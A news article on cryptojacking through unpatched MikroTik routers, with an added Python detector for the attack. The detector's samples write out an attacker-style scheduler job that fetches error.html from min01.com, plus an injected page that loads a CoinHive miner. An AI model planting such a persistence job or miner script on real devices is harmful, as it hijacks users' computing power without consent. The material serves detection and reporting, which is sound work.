
Unpatched MikroTik Routers Allow a Threat Actor to Mine Cryptocurrency

Attacker showed a clear understanding of how MikroTik routers work

By CBR Staff Writer

A malicious cryptocurrency mining operation that exploits a known, already-patched vulnerability in MikroTik network routers that have not yet received the fix has been targeting systems globally, with a particular focus on Brazil.

The attacker targets a known vulnerability in MikroTik enterprise routers and runs an exploit script to obtain administrator privileges on the router.

They then install a custom error page on the router, which is served only when a browsing error occurs.

Within this custom page is JavaScript that makes the browser of anyone who receives it spend spare CPU time mining cryptocurrency for the attacker; the router itself does not mine, it merely delivers the miner.

Simon Kenin, a researcher at Trustwave, noticed the unusual activity when he spotted a spike in CoinHive activity in Brazil.

Kenin commented in a blog post that: “I saw that all of these devices were using the same CoinHive sitekey, meaning that they all ultimately mine into the hands of one entity.”

CoinHive is a JavaScript cryptocurrency miner for the Monero blockchain. Because it is small and runs inside an ordinary browser, it has become popular with threat actors.


Hidden Threat

Mr Kenin also noted: “The attacker is clearly showing a high level of understanding of how these MikroTik routers work.”

“This can be seen in the persistence mechanism of the attacker: The attacker scheduled a task which connects to another host ‘min01.com’ and fetches a new ‘error.html’ file.”

“This was probably put in place in case CoinHive blocked the attacker’s current site-key and it had to be replaced with another,” he added.
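The two indicators described above, a scheduler entry that fetches a fresh error.html and an error page carrying a CoinHive miner tied to one sitekey, are straightforward to check for. The following is an added example, not code from the article or from Trustwave: it parses a RouterOS-style `/export` fragment for `/system scheduler` jobs that call `/tool fetch` for error.html, and scans a page for the CoinHive library and the sitekey it mines to. Both the export text and the error page are constructed samples; the sitekey and scheduler job name are made up.

```python
import re
from collections import Counter

# Constructed sample of a RouterOS "/export" fragment: one benign backup job
# and one job in the style of the persistence mechanism described in the
# article. Names and values are invented for illustration.
SAMPLE_EXPORT = """\
/system scheduler
add name=backup interval=1d on-event="/system backup save name=daily"
add name=u6 interval=1h on-event="/tool fetch address=min01.com src-path=error.html mode=http"
"""

# Constructed sample of an injected error page with a CoinHive miner.
# The sitekey is a placeholder, not a real one.
SAMPLE_ERROR_PAGE = """\
<html><body><h1>Error</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('EXAMPLE-SITEKEY-NOT-REAL'); m.start();</script>
</body></html>
"""

# key=value pairs as RouterOS prints them; values may be double-quoted.
ATTR_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')
# /tool fetch ... error.html anywhere in a scheduled command is the tell.
SUSPICIOUS_EVENT = re.compile(r'/tool\s+fetch\b.*\berror\.html\b', re.I)
COINHIVE_LIB = re.compile(r'coinhive\.min\.js', re.I)
SITEKEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([^'\"]+)['\"]")


def parse_scheduler(export_text):
    """Return one dict of attributes per 'add' line under /system scheduler."""
    entries = []
    in_sched = False
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith('/'):
            # A new section header; only /system scheduler is of interest.
            in_sched = (line == '/system scheduler')
            continue
        if in_sched and line.startswith('add '):
            attrs = {k: v.strip('"') for k, v in ATTR_RE.findall(line)}
            entries.append(attrs)
    return entries


def suspicious_scheduler_entries(export_text):
    """Scheduler jobs whose on-event fetches an error.html from somewhere."""
    return [e for e in parse_scheduler(export_text)
            if SUSPICIOUS_EVENT.search(e.get('on-event', ''))]


def find_coinhive(html):
    """(library loaded?, [sitekeys]) for one served page."""
    return bool(COINHIVE_LIB.search(html)), SITEKEY_RE.findall(html)


def sitekey_counts(pages):
    """Count sitekeys across many captured pages; one dominant key means one
    entity is collecting, which is the pattern Kenin observed."""
    counts = Counter()
    for html in pages:
        _, keys = find_coinhive(html)
        counts.update(keys)
    return counts


if __name__ == '__main__':
    for e in suspicious_scheduler_entries(SAMPLE_EXPORT):
        print('suspicious scheduler job:', e['name'], '->', e['on-event'])
    print('coinhive on page:', find_coinhive(SAMPLE_ERROR_PAGE))
    print('sitekeys seen:', sitekey_counts([SAMPLE_ERROR_PAGE, SAMPLE_ERROR_PAGE]))
```

On a real device, feed `suspicious_scheduler_entries` the output of `/export` and `find_coinhive` the page the router's web proxy returns for a failed request; the cleanup commands the article mentions mean the scheduler job may have been renamed, so match on the command, not the job name.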

MikroTik is a manufacturer of computer networking equipment, with a particular focus on wireless devices and routers, founded in Latvia in 1995.

The vulnerability being exploited was in fact patched quickly once it was discovered last April: MikroTik promptly issued an update for the affected routers.

However, there is little more the vendor can do in this situation except advise administrators of unpatched routers to install the latest software version immediately.

Interestingly, Kenin could see the attacker trying to cover their tracks: “I noticed this script being updated a few times while working on this blog. The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected.”
